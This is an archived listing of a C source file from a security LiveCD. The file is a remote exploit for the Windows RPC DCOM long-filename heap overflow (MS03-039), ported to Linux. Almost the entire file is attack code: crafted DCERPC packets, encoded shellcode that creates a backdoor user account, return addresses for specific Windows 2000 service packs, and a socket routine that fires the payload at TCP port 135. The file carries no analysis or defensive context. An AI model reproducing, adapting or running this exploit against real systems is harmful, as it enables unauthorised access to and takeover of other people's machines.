home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / MS03-039-linux.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  14KB  |  415 lines

---

1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2. <!-- saved from url=(0060)http://packetstormsecurity.nl/0309-exploits/MS03-039-linux.c -->
3. <HTML><HEAD>
4. <META http-equiv=Content-Type content="text/html; charset=windows-1252">
5. <META content="MSHTML 6.00.2800.1226" name=GENERATOR></HEAD>
6. <BODY><PRE>#include <stdio.h>
7. #include <stdlib.h>
8. #include <sys/types.h>
9. #include <sys/socket.h>
10. #include <netinet/in.h>
11. #include <arpa/inet.h>
12. #include <unistd.h>
13. #include <netdb.h>
14. #include <fcntl.h>
15. #include <unistd.h>
16.  
17. /* xfocus start */
18.  
19. unsigned char bindstr[]={
20. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00
21. ,
22. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00
23. ,
24. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46
25. ,0x00,
26. 0x00,0x00,0x00,
27. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
28. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
29.  
30. unsigned char request1[]={
31. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
32. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x0
33. 0
34. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x4
35. 5
36. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x0
37. 0
38. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5
39. E
40. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4
41. D
42. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x4
43. 1
44. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x0
45. 0
46. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x4
47. 5
48. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x0
49. 0
50. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x0
51. 0
52. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x0
53. 3
54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x0
55. 0
56. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x0
57. 0
58. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
59. 0
60. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x2
61. 9
62. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x0
63. 0
64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x0
65. 0
66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x0
67. 0
68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x0
69. 0
70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x0
71. 0
72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x0
73. 0
74. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x0
75. 0
76. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x0
77. 0
78. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x0
79. 0
80. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x1
81. 0
82. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xF
83. F
84. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
85. 0
86. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
87. 0
88. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
89. 0
90. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
91. 0
92. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x1
93. 0
94. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x0
95. 9
96. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x0
97. 0
98. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x0
99. 0
100. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x0
101. 0
102. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x0
103. 0
104. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x0
105. 0
106. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
107. 0
108. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x0
109. 0
110. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x0
111. 1
112. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x0
113. 3
114. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x0
115. 0
116. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0
117. E
118. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x0
119. 0
120. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
121. 0
122. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x0
123. 0
124. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x0
125. 0
126. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x0
127. 0
128. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x0
129. 0
130. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x0
131. 0
132. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
133. 0
134. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x0
135. 0
136. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x0
137. 0
138. ,0x00,0x00,0x00,0x00,0x00,0x00};
139.  
140. unsigned char request2[]={
141. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
142. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
143.  
144. unsigned char request3[]={
145. 0x5C,0x00
146. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x0
147. 0
148. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0
149. 0
150. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0
151. 0
152. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
153.  
154. //user="e" pass="asd#321"
155. unsigned char sc_add_user[]=
156. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
157. "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
158. "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
159. "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
160. "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
161. "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
162. "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
163. "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
164. "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
165. "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
166. "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
167. "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
168. "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
169. "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
170. "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
171. "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
172. "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
173. "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
174. "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
175. "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
176. #define sc_offset               0x24
177. #define sc_max                  0x208
178. #define jmp_addr_offset sc_max+sc_offset+0x8
179. #define top_seh_offset  jmp_addr_offset+0x4
180.  
181. unsigned char sc[]=
182. "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
183. "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
184. "\x43\x00\x24\x00\x5c\x00"
185. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
186. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
187. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
188. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
189. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
190. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
191. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
192. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
193. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
194. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
195. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
196. "\xe9\xf3\xfd\xff\xff"
197. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
198.  
199. unsigned char request4[]={
200. 0x01,0x10
201. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x0
202. 0
203. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8
204. C
205. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
206. };
207. /* end xfocus */
208.  
209. int type=0;
210. struct
211. {
212.         char    *os;
213.         u_long   dwTopSeh;
214.         char    *seh;
215.         u_long   dwJmpAddr;
216.         char    *jmp;
217. }
218. targets[] =
219. {
220.         { "2kEnSp4+MS03-026",
221.                 0x7c54144c,
222.                 "kernel32.dll v5.0.2195.6688",
223.                 0x77a1b496,
224.                 "OLEAUT32.dll v2.40.4522.0"},
225.         { "2kEnSp3+SomeHotFixs+MS03-026",
226.                 0x77eda1f0,
227.                 "kernel32.dll v5.0.2195.6079",
228.                 0x77a1afa9,
229.                 "OLEAUT32.dll v2.40.4518.0"}
230. }, v;
231.  
232.  
233.  
234.  
235. int main(int argc,char ** argv)
236. {
237.     int len,len1, sockfd, c, a;
238.     unsigned long ret;
239.         struct sockaddr_in addr_in;
240.     unsigned short port=135;
241.     unsigned char buf1[0x1000];
242.     unsigned char buf2[0x1000];
243.     int     i, iType;
244.         struct hostent *he;
245.         static char *hostname=NULL;
246.  
247.  
248.  
249.  
250.         printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
251.                         "Base on flashsky's MS03-026 exp\n"
252.                         "Code by ey4s<eyas#xfocus.org>\n"
253.                                                 "Ported to linux by nulluid\n"
254.                         "If success, target will add a user \"e\" and password 
255. is \"asd#321\"\n\n");
256.  
257.         if(argc!=3)
258.         {
259.                 printf("Usage: %s <target> <type>\n", argv[0]);
260.                                         for(i = 0; i < sizeof(targets)/sizeof(v
261. ); i++)
262.                         printf( "<%d>   %s\n"
263.                                         "      TopSeh=0x%.8x in %s\n"
264.                                         "      JmpAddr=0x%.8x in %s\n",
265.                                         i, targets[i].os,
266.                                         targets[i].dwTopSeh, targets[i].seh,
267.                                         targets[i].dwJmpAddr, targets[i].jmp);
268.                 return(1);
269.         }
270.  
271.         iType = atoi(argv[2]);
272.         if((iType<0) || iType > sizeof(targets)/sizeof(v))
273.         {
274.                 printf("[-] Wrong type.\n");
275.                 return;
276.         }
277.  
278.         hostname = argv[1];
279.  
280.  
281.         if(hostname==NULL)
282.     {
283.       printf("[-] Please enter a hostname with -d\n");
284.       exit(1);
285.     }
286.  
287.     printf("RPC DCOM remote exploit - .:[rootzero.net]:. - nulluid\n");
288.     printf("[+] Resolving host..\n");
289.  
290.     if((he = gethostbyname(hostname)) == NULL)
291.     {
292.       printf("[-] gethostbyname: Couldnt resolve hostname\n");
293.       exit(1);
294.     }
295.  
296.  
297.  
298.     /* drg */   
299.  
300.     memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
301.     memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
302.     memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
303.     printf("[+] Prepare shellcode completed.\n");
304.  
305.  
306.     memcpy(sc+36, (unsigned char *) ret, 4);
307.  
308.     addr_in.sin_family = AF_INET;
309.     addr_in.sin_addr = *((struct in_addr *)he->h_addr);
310.     addr_in.sin_port = htons(port);
311.  
312.  
313.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
314.     {
315.         perror("[-] Socket failed");
316.         return(0);
317.     }
318.     
319.     if(connect(sockfd,(struct sockaddr *)&addr_in, sizeof(struct sockaddr)) == 
320. -1)
321.     {
322.         perror("[-] Connect failed");
323.         return(0);
324.     }
325.  
326.         printf("[+] Connect to %s:135 success.\n", argv[1]);
327.  
328.         if(sizeof(sc_add_user) > sc_max)
329.         {
330.                 printf("[-] shellcode too long, exit.\n");
331.                 return;
332.         }
333.  
334.  
335.  
336.                     /* xfocus start */
337.     len=sizeof(sc);
338.     memcpy(buf2,request1,sizeof(request1));
339.     len1=sizeof(request1);
340.     
341.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
342.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
343.     
344.     memcpy(buf2+len1,request2,sizeof(request2));
345.     len1=len1+sizeof(request2);
346.     memcpy(buf2+len1,sc,sizeof(sc));
347.     len1=len1+sizeof(sc);
348.     memcpy(buf2+len1,request3,sizeof(request3));
349.     len1=len1+sizeof(request3);
350.     memcpy(buf2+len1,request4,sizeof(request4));
351.     len1=len1+sizeof(request4);
352.     
353.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
354.     
355.  
356.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
357.   
358.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
359.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
360.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
361.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
362.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
363.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0x
364. c;
365.     /* end xfocus */
366.  
367.  
368.  
369.         len=send(sockfd,bindstr,sizeof(bindstr),0);
370.     if(len<=0)
371.         {
372.             perror("[-] Send failed");
373.             return(1);
374.     }
375.         else 
376.                 printf("[+] send %d bytes.\n", len);
377.  
378.  
379.     len=recv(sockfd, buf1, 1000, 0);
380.         if(len<=0)
381.     {
382.             printf("[-] recv error\n");
383.             return(1);
384.     }
385.     else
386.             printf("[+] recv %d bytes.\n", len);
387.     
388.  
389.     len = send(sockfd,buf2,len1,0);
390.         if(len<=0)
391.     {
392.             printf("[-] Send failed.\n");
393.             return(1);
394.     }
395.         else
396.                 printf("[+] send %d bytes.\n", len);
397.  
398.  
399.         len=recv(sockfd,buf1,1024,0);
400.         if(len<=0)
401.         {
402.                 printf("[+] Target crash or exploit success? :)\n");
403.         }
404.         else
405.                 printf("[-] recv %d bytes. Bad luck!\n", len);
406.         
407.         return(0);
408.  
409. }
410.  
411.  
412.  
413.  
414. </PRE></BODY></HTML>
415.